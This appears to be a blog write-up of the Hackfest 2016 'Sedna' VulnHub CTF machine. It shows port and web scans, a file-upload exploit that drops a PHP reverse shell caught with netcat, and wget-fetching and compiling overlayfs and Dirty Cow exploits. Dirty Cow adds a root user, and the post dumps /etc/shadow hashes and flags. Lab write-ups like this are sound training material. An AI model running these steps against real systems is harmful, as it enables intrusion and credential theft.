5 December 2022

Pentesting Fun Stuff

following the cyber security path…

hackfest2016: Sedna

Location

https://download.vulnhub.com/hackfest2016/Sedna.ova

Description

This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Medium
According to the description there are multiple ways to root this box. This machine should be doable for someone who has some experience.
There are 4 flags on this machine 1 for a shell, 1 for root access and 2 for doing post exploitation on Sedna.

Getting started

Starting with nmap to see what ports are open and what services run behind them.

┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -sC -p- 192.168.171.5
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 20:18 CET
Nmap scan report for 192.168.171.5
Host is up (0.0096s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
|   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE STLS TOP RESP-CODES SASL UIDL CAPA PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47986/tcp  status
|_  100024  1          52537/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS IDLE more have ID post-login SASL-IR listed capabilities LOGINDISABLEDA0001 STARTTLS LITERAL+ IMAP4rev1 ENABLE OK Pre-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGIN-REFERRALS IDLE more ID have SASL-IR post-login listed OK capabilities LITERAL+ IMAP4rev1 ENABLE AUTH=PLAINA0001 Pre-login
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: TLS randomness does not represent time
995/tcp   open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T19:17:14
|_Not valid after:  2026-10-07T19:17:14
|_ssl-date: ERROR: Script execution failed (use -d to debug)
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
47986/tcp open  status      1 (RPC #100024)
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m56s, deviation: 0s, median: 59m56s
|_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-03-17T16:20:58-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.68 seconds

A lot of open ports and services running. I’ll start with port 80 and work my way through the list of open ports.

Webserver

First stop is the main page. Nothing much in the source code, so it’s time to start up dirsearch.

┌─[n13mant@planetmars]─[~]
└──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 4614
Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-56-27.log
Target: http://192.168.171.5
[12:56:27] Starting:
[12:56:27] 200 -  101B  - /
[12:56:27] 403 -  284B  - /.hta
[12:56:40] 301 -  314B  - /blocks  ->  http://192.168.171.5/blocks/
[12:56:56] 301 -  313B  - /files  ->  http://192.168.171.5/files/
[12:57:03] 200 -  101B  - /index.html
[12:57:13] 301 -  315B  - /modules  ->  http://192.168.171.5/modules/
[12:57:28] 200 -   36B  - /robots.txt
[12:57:31] 403 -  293B  - /server-status
[12:57:38] 301 -  314B  - /system  ->  http://192.168.171.5/system/
[12:57:39] 301 -  314B  - /themes  ->  http://192.168.171.5/themes/

Because there is a proxy server running I’ll do the dirsearch scan again, but this time via the proxy server.

┌─[n13mant@planetmars]─[~]
└──╼ $python3 ./dirsearch/dirsearch.py -u 'http://192.168.171.5:8080/' -r -e php -w '/usr/share/wordlists/dirb/common.txt' -x 404,405
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 4614
Error Log: /home/n13mant/dirsearch/logs/errors-17-03-21_12-58-28.log
Target: http://192.168.171.5:8080/
[12:58:28] Starting:
[12:58:29] 200 -    2KB - /
[12:58:53] 302 -    0B  - /docs  ->  http://192.168.171.5:8080/docs/
[12:58:57] 302 -    0B  - /examples  ->  http://192.168.171.5:8080/examples/
[12:59:05] 302 -    0B  - /host-manager  ->  http://192.168.171.5:8080/host-manager/
[12:59:07] 200 -    2KB - /index.html
[12:59:13] 302 -    0B  - /manager  ->  http://192.168.171.5:8080/manager/
[12:59:14] 302 -    0B  - /META-INF  ->  http://192.168.171.5:8080/META-INF/

This time I get a basic HTML authentication. Before continuing this lead, I run a nikto scan on port 80 first.

┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.5
+ Target Hostname:    192.168.171.5
+ Target Port:        80
+ Start Time:         2017-03-21 18:52:15 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-03-21 18:53:05 (GMT1) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A license file with possible site software. Worth taking a look. First I run nikto again, but this time via the proxy server.

┌─[n13mant@planetmars]─[~]
└──╼ $nikto -h 'http://192.168.171.5/' --useproxy 'http://192.168.171.5:8080/'
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.171.5
+ Target Hostname:    192.168.171.5
+ Target Port:        80
+ Proxy:              192.168.171.5:8080
+ Start Time:         2017-03-21 13:16:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS (May be proxy's methods, not server's)
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7838 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-21 13:17:49 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Looking at all the information gathered I decide to check out the licence file first.

After a quick search on exploit-db it seems like there is an exploit which leads to an arbitrary file upload that will place the file in the/files/ folder.
In the exploit mentioned there is a piece of HTML code I can use to inject it into the page which creates a form to upload files.

For the upload I use the php reverse shell code from pentestmonkey. After I finished the upload I run the file and this way get a reverse shell.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from 192.168.171.5 60358 received!
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 15:17:37 up 37 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Now to look around the system.

www-data@Sedna:/home$ cat /etc/passwd
cat /etc/passwd
[.....SNIP....]
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
www-data@Sedna:/home$ cd /var/www
cd /var/www
www-data@Sedna:/var/www$ ls -lah
ls -lah
total 16K
drwxr-xr-x  3 root     root     4.0K Oct 22 13:33 .
drwxr-xr-x 13 root     root     4.0K Oct  7 15:17 ..
-rw-r--r--  1 www-data www-data   33 Oct 22 13:33 flag.txt
drwxr-xr-x  9 www-data www-data 4.0K Oct 25 09:27 html
www-data@Sedna:/var/www$ cat flag.txt
cat flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289

First flag.

www-data@Sedna:/$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
www-data@Sedna:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Ubuntu 14.04 and kernel 3.13.0 Maybe an overlayfs exploit will work to get root.
I download the code from exploit-db and paste it into a file on my local system. With SimpleHTTPServer I wget it onto the remote system. From there I compile it and run it.

www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/overlayfs.c
wget http://192.168.171.3:8000/overlayfs.c
--2017-03-24 00:34:09--  http://192.168.171.3:8000/overlayfs.c
Connecting to 192.168.171.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/plain]
Saving to: 'overlayfs.c'
100%[======================================>] 4,968       --.-K/s   in 0s
2017-03-24 00:34:09 (583 MB/s) - 'overlayfs.c' saved [4968/4968]
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs.c
chmod 777 overlayfs.c
www-data@Sedna:/tmp/n13mant$ gcc overlayfs.c -o overlayfs
gcc overlayfs.c -o overlayfs
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfc
chmod 777 overlayfc
chmod: cannot access 'overlayfc': No such file or directory
www-data@Sedna:/tmp/n13mant$ chmod 777 overlayfs
chmod 777 overlayfs
www-data@Sedna:/tmp/n13mant$ ./overlayfs
./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
www-data@Sedna:/tmp/n13mant$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The start looked promising…but unfortunately no root. With the kernel version number in hand I tried several exploits. After a while I tried the ‘dirty cow’ exploit. It’s a race condition that was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. In other words, an unprivileged local user could get write access to a read-only memory mapping and raise his privileges. There is a very good explanation about ‘Dirty Cow’, which you can find here. Also to be fair….I must warn you that if you try different ‘Dirty Cow’ exploits it’s wise to make a snapshot of your Sedna box because the exploit can crash your box and you need a fresh one to try again. In RL this would mean admins will probably get the signal there is something wrong with their server as it crashed, which normally isn’t a good thing LoL.
After a few tries I found out the ‘Dirty Cow’ exploit from Firefart did the trick. After downloading the source code to the remote machine, I compiled and ran it. Unfortunately with this exploit I need to act fast. After I run the exploit it will make the box to freeze up and I need to reboot it.

www-data@Sedna:/tmp$ mkdir n13mant
mkdir n13mant
www-data@Sedna:/tmp$ cd n13mant
www-data@Sedna:/tmp/n13mant$ wget http://192.168.171.3:8000/40839.c
wget http://192.168.171.3:8000/40839.c
--2017-03-25 11:25:25--  http://192.168.171.3:8000/40839.c
Connecting to 192.168.171.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5124 (5.0K) [text/plain]
Saving to: '40839.c'
100%[======================================>] 5,124       --.-K/s   in 0s
2017-03-25 11:25:25 (743 MB/s) - '40839.c' saved [5124/5124]
www-data@Sedna:/tmp/n13mant$ gcc -pthread 40839.c -o dcow -lcrypt
gcc -pthread 40839.c -o dcow -lcrypt
www-data@Sedna:/tmp/n13mant$ ./dcow thisismypassword
./dcow thisismypassword
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: thisismypassword
Complete line:
firefart:fiYb0/QFCUAsk:0:0:pwned:/root:/bin/bash
mmap: b7752000

Now to move fast.

┌─[n13mant@planetmars]─[~]
└──╼ $ssh -l firefart 192.168.171.5
firefart@192.168.171.5's password:
Added user firefart.
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Sat Mar 25 11:49:03 EDT 2017
  System load: 0.41              Memory usage: 4%   Processes:       51
  Usage of /:  29.7% of 7.26GB   Swap usage:   0%   Users logged in: 0
  => There is 1 zombie process.
  Graph this data and manage this system at:
    https://landscape.canonical.com/
Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# cat /etc/shadow
root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::
[.....SNIP.....]
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::
statd:*:17110:0:99999:7:::
firefart@Sedna:~# ls -lah
total 65M
drwx------  5 firefart root 4.0K Mar 12 00:54 .
drwxr-xr-x 21 firefart root 4.0K Oct  7 15:17 ..
-rw-r--r--  1 firefart root  65M Oct 24 07:04 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
-rw-------  1 firefart root  212 Mar 12 00:54 .bash_history
-rw-r--r--  1 firefart root 3.1K Feb 19  2014 .bashrc
drwx------  2 firefart root 4.0K Oct 22 22:14 .cache
drwxr-xr-x  2 firefart root 4.0K Oct  7 20:04 chkrootkit
----------  1 firefart root   33 Oct 22 13:07 flag.txt
-rw-r--r--  1 firefart root  140 Feb 19  2014 .profile
-rw-r--r--  1 firefart root   66 Oct  8 03:34 .selected_editor
drwx------  2 firefart root 4.0K Oct 22 22:14 .ssh
firefart@Sedna:~# cat flag.txt
a10828bee17db751de4b936614558305

I got root…..I got the flag…..game over.
There are some more flags to gain. For example by probably cracking the hash from ‘crackmeforpoints’ or ‘root’ with hashcat or John the Ripper, but for time purposes I’ll let someone else do that.

Conclusion

The challenge was a bit frustrating. Not many hints or leads to get further and when you finally get a working exploit, the system gets unstable and you need to hurry to get the job done. Too slow and you need to reboot and try again. I think the challenge would be a bit more fun if the system would be a bit more stable after the exploit. If someone else has a better solution, please do tell.
 
 
 
 
 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.